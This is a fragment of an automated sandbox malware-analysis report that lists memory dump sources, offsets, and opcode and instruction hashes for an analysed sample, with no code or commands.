                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d7b46ea100db53fb0b8853a72d9a9b4692b19bff20ae14ba384a8c5d65bb8b0f
                                                                                                                                                                          • Instruction ID: 1409e56977856c185a0b0d8d7aaff89b7c8aae6fa6b6d00990f54fa084d9de14
                                                                                                                                                                          • Opcode Fuzzy Hash: d7b46ea100db53fb0b8853a72d9a9b4692b19bff20ae14ba384a8c5d65bb8b0f
                                                                                                                                                                          • Instruction Fuzzy Hash: 55017C3071840A8BDB58FF58D0D2DA6B361EFA431071182F5D8199B29FDA2AFE95C7D0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: dcdfc0bac03398bbfbad83b544489303312c09fb8d8af75d80c8c4b9c4a5b278
                                                                                                                                                                          • Instruction ID: 001335ecbb4f21c3579625b8bea8ecd1f8af369268741708b11defecea894903
                                                                                                                                                                          • Opcode Fuzzy Hash: dcdfc0bac03398bbfbad83b544489303312c09fb8d8af75d80c8c4b9c4a5b278
                                                                                                                                                                          • Instruction Fuzzy Hash: 29F0A470B09A8C4FDB55FBA894616A87BF1EF89310B02017DD04EC72D7CD286942C740
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 80eeb6c11c4ffadfb945d9281d92dca4fe44f4c33cc6bf5480f41b81bfcb6d22
                                                                                                                                                                          • Instruction ID: 3386f7406c2ea46a707462303189be148d62783970f1562962cacd7bf586833d
                                                                                                                                                                          • Opcode Fuzzy Hash: 80eeb6c11c4ffadfb945d9281d92dca4fe44f4c33cc6bf5480f41b81bfcb6d22
                                                                                                                                                                          • Instruction Fuzzy Hash: 5FF03C20B28E0E4EEBB8FB698061BB6A2D1BF58204B414579944FC39E6DE28B945C340
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 00a3e596df48035478ff676c4b5b8cce1a45e892cf838ba811fa2a29b5efa18e
                                                                                                                                                                          • Instruction ID: 3d93b654ff79d33c851163517894366b1f634d871668afaebbf7cde7b7cafb93
                                                                                                                                                                          • Opcode Fuzzy Hash: 00a3e596df48035478ff676c4b5b8cce1a45e892cf838ba811fa2a29b5efa18e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF04460B29E0E4EEAB8FB69C061A7673D1BF54304B414579944FC35E2DD28FA45C340
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4bf915828a75e0efd7b8144b9721b7d66fc471cc94de40a60ab237b1d94b0bfb
                                                                                                                                                                          • Instruction ID: 7d190b18fa4f23ce2d379728542db092ca6099861653697f1caf5819ab2b0125
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bf915828a75e0efd7b8144b9721b7d66fc471cc94de40a60ab237b1d94b0bfb
                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C80F0E3875AE63162E808A207C06902B662457960575D546851E3D85C6A069255
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                                                          • Instruction ID: 0d109ca4a409cb612531bec065999ce285cacde773b9f389c4fe26e9700b01cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                                                          • Instruction Fuzzy Hash: 76B09200F8EE0B52E63418E008AC03C00410B48340A165B30A20F452E2DC7A2A106150